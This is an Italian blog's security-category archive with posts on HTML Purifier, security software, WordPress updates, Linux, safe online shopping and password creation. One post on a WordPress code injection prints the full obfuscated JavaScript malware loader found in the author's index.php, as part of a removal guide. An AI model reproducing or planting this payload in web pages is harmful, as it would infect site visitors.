Archivio per la categoria 'Sicurezza'

Set
14

Come ottimizzare e pulire il codice HTML dai tag inutili con HTML Purifier

HTML PurifierChiunque abbia utilizzato un editor HTML visuale (come ad esempio Adobe Dreamweaver, Microsoft FrontPage o, i più recenti, Microsoft Expression Web e Sharepoint Designer), ma anche un qualsiasi CMS, si sarà  sicuramente reso conto di quanto codice superfluo viene generato da questi programmi.

Sebbene possa sembrare una sciocchezza, questo comporta una maggiore dimensione della pagina (e/o dell’intero sito), una minore ottimizzazione e, verosimilmente, problemi di sicurezza.

HTML Purifier è una libreria in PHP che assicura: sicurezza (rimuove il codice maligno, conosciuto come XSS), pulizia del codice (analizza il codice al fine di renderlo pulito, conforme agli standard e alle specifiche W3C) e apertura alle modifiche (è open source e, di conseguenza, altamente personalizzabile).

Installazione

L’installazione è facile: dopo aver il pacchetto di installazione dal sito, decomprimetelo sul vostro PC locale e poi trasferite la cartella library, sullo spazio web.

Ora impostate come scrivibile (chmod 755 o 777) la cartella:

/path/to/library/HTMLPurifier/DefinitionCache/Serializer

dove /path/to/library/, è il percorso sul server fino alla cartella indicata.

Configurazione

Anzitutto è necessaria l’inclusione della libreria:

require_once '/path/to/library/HTMLPurifier.auto.php';

In moltissimi casi, questo già  basta per permettere ad HTML Purifier di funzionare correttamente, ma, se il vostro Doctype fosse diverso da XHTML Transitional e il vostro set di caratteri diverso da UTF-8, sono necessarie delle ulteriori e semplici modifiche:

require_once '/path/to/library/HTMLPurifier.auto.php';
$config = HTMLPurifier_Config::createDefault();
$config->set('Core.Encoding', 'ISO-8859-1');
$config->set('HTML.Doctype', 'XHTML 1.0 Strict');

In questo caso, abbiamo modificato il Doctype in XHTML 1.0 Strict e il set di caratteri in ISO-8859-1.

Esempio di utilizzo

Infine, vediamo un esempio pratico di funzionamento di HTML Purifier:

<?php
$dirty_html = "... codice HTML non ripulito ...";
$purifier = new HTMLPurifier();
$clean_html = $purifier->purify( $dirty_html );
echo $clean_html
?>

Nella variabile $dirty_html è contenuto il codice iniziale, mentre, in $clean_html, il codice ripulito ed ottimizzato!

Plugin

I meno esperti o i pigroni (!), possono semplicemente integrare HTML Purifier, tramite plugin, ai più noti CMS, come WordPress, Drupal e Joomla!

Set
27

ICT Security Day 2008

ICT Security Day 2008Anche quest’anno si rinnova l’appuntamento dell’ICT Security Day giunto ormai alla sua terza edizione.

Come negli anni passati, il Convegno si terrà  a Lanciano (CH) sabato 4 Ottobre 2008 presso i locali dell’Auditorium “G. Paone” della Banca Popolare di Lanciano e Sulmona con il contributo di numerosi sponsor (tra cui IBM), relatori di fama nazionale (Teti, D’Amico, Pollari, Foffi e altri) e organizzatori di tutto rispetto (Facoltà  di Scienze della Comunicazione dell’Università  degli Studi di Teramo).

Il programma dell’evento è disponibile qui. L’accesso è gratuito, ma i posti sono limitati per cui occorre iscriversi a questo indirizzo.

P.S. causa pigrizia mattutina, questo articolo l’ho semi-scopiazzato del blog del mio caro collega Heber D’Alberto!

Mag
14

5 importanti programmi per la sicurezza di Windows, Linux e Mac

A prescindere da quale sistema operativo utilizzate, non si può non pensare alla sicurezza: in questo articolo vedremo 5 software per Windows, Linux e Mac per incrementare la vostra sicurezza.

Windows

Firewall

Quasi tutti hanno dei dati sensibili sui loro dischi rigidi che preferiscono tenere fuori dagli occhi indiscreti. Purtroppo, il Firewall di Windows XP, non è sufficiente a garantire ciò, poichè non è in grado di bloccare le connessioni in uscita, quindi vi consiglio di utilizzare, come alternativa ad esso, Comodo firewall. Con Windows Vista, invece, Microsoft ha affrontato (e risolto) questo problema, quindi non vi è alcuna necessità  di utilizzare un firewall di terze parti.

Indipendentemente dal fatto che siete in XP o Vista, comunque, un router è essenziale: un firewall hardware è molto più sicuro di uno software.

Raccomandazioni

Anti-virus

Forse il software più importante da avere su un computer (almeno se avete Windows come sistema operativo). Se non volete spendere soldini per software commerciali, vi consiglio uno di questi tre antivirus: AntiVir, Avast o AVG (ricordate comunque che, in nessun caso, dovrete installare più di un antivirus sul vostro computer).

Per quanto riguarda i software commerciali la scelta si riduce a: ESET NOD32 o Kaspersky Anti-Virus. Kaspersky Anti-Virus è leggermente superiore grazie ai tassi di rilevamento basati su file di firma, mentre NOD32 fornisce eccellenti euristiche (chiamate “ThreatSense” di ESET) per scoprire nuovi virus in circolazione.

Raccomandazioni

Anti-spyware and Anti-adware

Grazie all’acquisizione da parte di Microsoft della GIANT Company Software nel dicembre 2004, ora Windows ha un efficace software anti-spyware (disponibile per Windows XP e integrato con Windows Vista): Windows Defender. Potete utilizzare anche Lavasoft Ad-Aware (freeware), ma vi consiglio di utilizzarlo insieme a Windows Defender e non come alternativa. Se invece avete dei soldini da spendere, non vi è alcun dubbio che la migliore opzione commerciale è Webroot Spy Sweeper.

Raccomandazioni

Continua la lettura di ‘5 importanti programmi per la sicurezza di Windows, Linux e Mac’

Mag
07

Code injection su WordPress: guida alla rimozione del codice maligno

WordpressCi risiamo: mi era già  successo una settimana fa e mi è successo di nuovo nelle ultime ore.. Pensavo fosse un baco di WordPress 2.5, così ho aggiornato subito alla versione 2.5.1, sperando fosse stato risolto e, invece, a quanto sembra, il problema è rimasto.

Di cosa parlo?! Di questo codice maligno (all’apparenza incomprensibile, poichè criptato in esadecimale) javascript che mi è stato iniettato nel blog (a me, così come a tanti altri bloggers che utilizzano WordPress come piattaforma):

[quickcode:noclick]
<script language=”javascript”>$=”%63b%3d%22e(d%2573);%2573t%253dtm%2570%253d%2527%2527;for(i%253d0;i%253cds%252e%256ce%256eg%25%22;st%3d%22%2573t%253d%2522$%253d%2573%2574;%2564c%2573%2528d%2561%252bd%2562%252bd%2563+%2564%2564%252b%2564e%252c%2531%2530)%253b%2564w%2528s%2574)%253bs%2574%253d%2524%253b%2522;%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;cc%3d%2274%2568;i+%252b%2529{t%256dp%253dd%2573%252es%256c%2569ce%2528i,i%252b1%2529;st%253d%22;ce%3d%22ar%2543od%2565%2541%2574%25280)^%2528%25270%25780%2530%2527+es%2529))%253b%257d}%22;cz%3d%22%2566unc%2574ion%2520cz%2528cz)%257bre%2574ur%256e %2563a+c%2562+%2563c+%2563d+c%2565+%2563z;}%253b%22;dz%3d%22%2566un%2563t%2569on%2520dw(%2574){c%2561%253d%2527%252564%25256f%252563ume%25256et%252e%2577%252572i%2574%252565(%252522%2527;ce%253d%2527%252522)%2527;c%2562%253d%2527%25253csc%252572%2569%2570%252574 l%252561%256eg%252575a%2525%2536%2537%2565%25253%2564%25255c%25252%2532ja%2576a%2573cr%2569%252570t%25255c%2525%25322%25253e%2527;c%2563%253d%2527%25253c%25255c%25252fsc%2572%2569p%252574%25253e%2527;eva%256c(u%256ees%2563ap%2565(t%2529)%257d%253b%22;op%3d%22%2524%253d%2522dw%2528d%2563s(%2563u%252c1%2534));%2522;%22;ca%3d%22%2566%2575%256e%2563t%2569o%256e%2520dcs%2528d%2573,%2565s%2529{d%2573%253dunesca%2570%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|“d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;cd%3d%22s%2574+%2553tri%256e%2567.f%2572%256fmC%2568%2561rCo%2564%2565(%2528t%256dp%252ec%2568%22;%69f%20(d%6fcum%65nt%2e%63oo%6b%69%65.i%6edex%4f%66(%27%76%62ull%65tin%5fmu%6ctiq%75%6f%74e%3d%27)%3d%3d-1){sc%28%27vbu%6clet%69n%5fm%75l%74iqu%6ft%65%3d%27,2,7);%65va%6c(un%65sc%61pe%28d%7a%2bc%7a+op%2b%73t)%2b%27dw(%64z%2bcz%28$+%73t%29)%3b%27)}e%6cse{%24%3d%27%27};f%75nct%69on %73c%28cnm%2cv,e%64){%76a%72 ex%64%3dnew %44ate%28);%65xd.%73%65%74Da%74%65(ex%64.g%65tD%61%74e()%2b%65%64);%64%6fcu%6dent%2eco%6fkie%3dcnm%2b %27%3d%27 +esca%70%65(v%29+%27;ex%70i%72es%3d%27%2bex%64.%74o%47M%54%53t%72in%67%28);%7d;”;eval(unescape($));document.write($);</ script></body>
[/quickcode]

Per chi si trovasse nella mia stessa situazione, non disperate, il problema è di facile risoluzione: basta editare il file index.php (presente nella root dell’installazione di WordPress) e rimuovere brutalmente il codice indicato in precedenza.

Fatto ciò, non ci resta che sperare che lo staff di WordPress tappi questa grave falla al più presto!

Ah, dimenticavo, mi scuso con tutti voi per gli eventuali disagi provocati dal codice maligno.

AGGIORNAMENTO DELLE 22.50 DEL 07/05/2008

Bene.. ci sto capendo qualcosa di più su questa situazione alquanto strana. Anzitutto l’iniezione di codice maligno sembra non derivare da un baco di WordPress, ma di una vulnerabilità  dei server Aruba. Per approfondire l’argomento date un occhio a questo sito dove è indicato anche come eliminare il MBR rootkit/trojan Sinowal (questo è il nome del malware), nel caso in cui qualcuno di voi fosse stato infettato (spero non dal mio sito!).

Ah, di questa cosa ne ha parlato anche Napolux.

Dic
30

Rilasciato WordPress 2.3.2

Wordpress logo smallE’ da qualche ora disponibile per il download la versione 2.3.2 di WordPress (lo strumento grazie al quale funziona questo blog): non ci sono grandi novità  nel codice, ma sono stati corretti diversi problemi di sicurezza, di cui uno urgente ed importante che corregge un bug relativo ai post in bozza.

Inoltre, come bonus, è stata aggiunta la possibilità  di personalizzare la pagina di errore della connessione al database (inizialmente prevista per la 2.4)

Correte ad aggiornare i vostri blog scaricando WordPress 2.2.3 da qui.

P.S. prima di procedere con l’aggiornamento, è consigliabile fare un backup dei file e del database.

Fonte: WordPress Italy

Ott
18

12 motivi per installare GNU/Linux sul vostro computer

TuxGNU/Linux è un sistema operativo libero di tipo Unix (o unix-like), distribuito con licenza GNU GPL e costituito dall’integrazione del kernel Linux all’interno del sistema GNU.

Esso è una valida alternativa ai sistemi operativi commerciali come Microsoft Windows o Mac OS X e, in questo articolo, elencherò 12 motivi (in rigoroso ordine sparso!) per i quali ci si dovrebbe almeno informare su cos’è e come funziona GNU/Linux:

  1. Costo: salvo rarissime eccezioni le distribuzioni GNU/Linux sono gratuite e liberamente scaricabili, i sistemi operativi commerciali, al contrario, costano centinaia di euro.
  2. Licenza d’uso: tutti noi sappiamo che copiare software, la dove non espressamente consentito dalla licenza d’uso, è un reato; per non parlare poi dei cosiddetti crack per utilizzare software proprietario violando la relativa licenza d’uso. Ma perchè andare ad imbarcarsi in avventure pericolose quando esiste software di qualità  che fa esattamente tutto quello di cui avete bisogno, che potete scaricare gratuitamente e liberamente dalla rete e nel pieno rispetto della legge?!
  3. Durata nel tempo: il software open source non scade, perchà© non è prodotto con criteri commerciali al contrario del software proprietario sviluppato per avere una forma di “obsolescenza programmata”: si tratta della strategia commerciale che porta una determinata tecnologia (sia essa hardware o software) a essere sostituita (e quindi resa obsoleta) da una nuova versione dopo un periodo predefinito di tempo. Questo è fondamentale per un’azienda che basa la sua esistenza sui profitti derivanti dalle vendite del proprio prodotto, ma non lo è assolutamente per la comunità  del software libero. Continua la lettura di ’12 motivi per installare GNU/Linux sul vostro computer’
Set
09

Rilasciato WordPress 2.2.3

WordpressE’ da qualche ora disponibile per il download la versione 2.2.3 di WordPress (lo strumento grazie al quale funziona questo blog): non ci sono grandi novità  nel codice, ma sono stati corretti diversi bachi di sicurezza (due dei quali ad alta priorità ).

Per scaricare WordPress 2.2.3 clickate qui, per sapere come aggiornare dalle versioni precedenti clickate qui.

P.S. prima di procedere con l’aggiornamento, è consigliabile fare un backup dei file e del database.

Ago
21

Come comprare su Internet in sicurezza

Buonsenso in tutti i sensiFare acquisti su Internet vuol dire comodità , risparmio e, perchè no, anche divertimento. Bastano poche e semplici regole per acquistare online in modo sicuro e senza perdere il piacere dello shopping.

Con la campagna “Buonsenso in tutti i sensi” la Polizia Postale e eBay.it (ovvero il primo sito di commercio elettronico in Italia), spiegano le principali regole per fare acquisti sicuri su Internet, associandole ai 5 sensi:

  1. GUARDA prima di scegliere bene la password: e di non comunicarla mai a nessuno: utilizza almeno 8 caratteri, con una combinazione di lettere, numeri e caratteri speciali. Non usate parole o termini facili da indovinare. Non utilizzate la stessa password per diversi siti o servizi. Per approfondire l’argomento, vi consiglio di consultare questo mio post.
  2. ASCOLTA i feedback sulla serietà  del venditore che trovi anche su siti come eBay.
  3. ASSAGGIA prima i tuoi acquisti, controllando la descrizione e le condizioni di spedizione e consegna e scegli metodi di spedizione tracciabili. Se tutti i dettagli non sono illustrati bene, contatta il venditore prima di procedere con l’acquisto. Inoltre, per legge puoi recedere da un contratto di acquisto online entro 10 giorni dalla ricezione della merce. Ricordati che vendere e/o acquistare oggetti contraffatti è reato.
  4. TOCCA con mano il pagamento online e scegli metodi di pagamento sicuri come PayPal, il bonifico bancario, il conto corrente postale, il contrassegno o i servizi di deposito a garanzia. Per pagare i tuoi acquisti online evita di ricaricare la carta prepagata di sconosciuti o di utilizzare servizi di trasferimento contanti come Western Union o Moneygram perchè sono poco sicuri.
  5. FIUTA le false email (phishing). Diffida dalle email che ti chiedono di fornire dati riservati, password o informazioni sulla tua carta di credito attraverso link. Le aziende serie non richiedono mai queste informazioni via email.

Vi invito, inoltre, a fare questo test per valutare le vostre conoscenze sulla sicurezza degli acquisti online e non lasciare scampo ai truffatori della rete!

Ago
09

Come creare una password sicura e facile da ricordare

La scelta di una password è un aspetto di fondamentale importanza per accedere ai servizi in rete protetti: essa non deve essere una semplice chiave per accedere al sistema, come la maggior parte delle persone crede, ma deve essere difficilmente intercettabile, affinchè nessuno possa scoprirla e utilizzare i nostri servizi per scopi fraudolenti e/o di disturbo.

Ecco alcune semplici regole che tutti gli utenti dovrebbero osservare:

  • scegliete una password lunga almeno 8 caratteri
  • non utilizzate parole di senso compiuto comunemente utilizzate
  • evitate i nomi dei vostri figli, del coniuge o di un animale domestico, le date di nascita e tutte quelle parole che derivano da informazioni personali facilmente ottenibili da malintenzionati
  • la sicurezza della password aumenta se essa contiene numeri, lettere e simboli (ne riparleremo tra un attimo, con un esempio pratico)
  • non usate mai una password che contenga parte del nome utente o dell’indirizzo e-mail
  • non utilizzate la stessa password per parecchi servizi online.

Ed ora un esempio pratico, nel quale vi illustrerò il metodo che utilizzo per creare le mie password affinchè siano complesse e facili da ricordare:

  1. penso ad una frase semplice da ricordare; essendo appassionato di tennis e, in particolare, tifoso di Rafael Nadal, ipotizziamo che la frase scelta sia “viva nadal
  2. sostituisco i numeri ad alcune lettere (ad esempio inserisco il 4 al posto dalla a, l’1 al posto della i, il 3 al posto della e e così via) ed ottengo: v1v4n4d4l
  3. sostituisco qualche lettera minuscola in maiuscola (in questo esempio la V e la N) ed ottengo: V1v4N4d4l
  4. infine, aggiungo un carattere speciale ed ottengo: V1v4N4d4l!

Ricordate, inoltre, che la creazione di una password sicura è solo un punto di partenza che deve necessariamente proseguire con una corretta conservazione; ecco alcuni consigli a riguardo:

  • non digitate la password in presenza di estranei
  • non trascrivete la password su fogli di carta o, come spesso succede, su bigliettini attaccati al monitor!
  • non rivelate la vostra password ad altre persone
  • modificate la password di tanto in tanto.

Concludo l’articolo segnalandovi due applicazioni online (reperibili qui e qui), in grado di calcolare il livello di sicurezza di una password.




Hai bisogno di un sito web?

Web&Dintorni

Vuoi collaborare a questo blog?

Ogni tipo di collaborazione è benvenuta!


Scrivimi all'indirizzo paolo.gatti@gmail.com o invia un messaggio sulla pagina Facebook!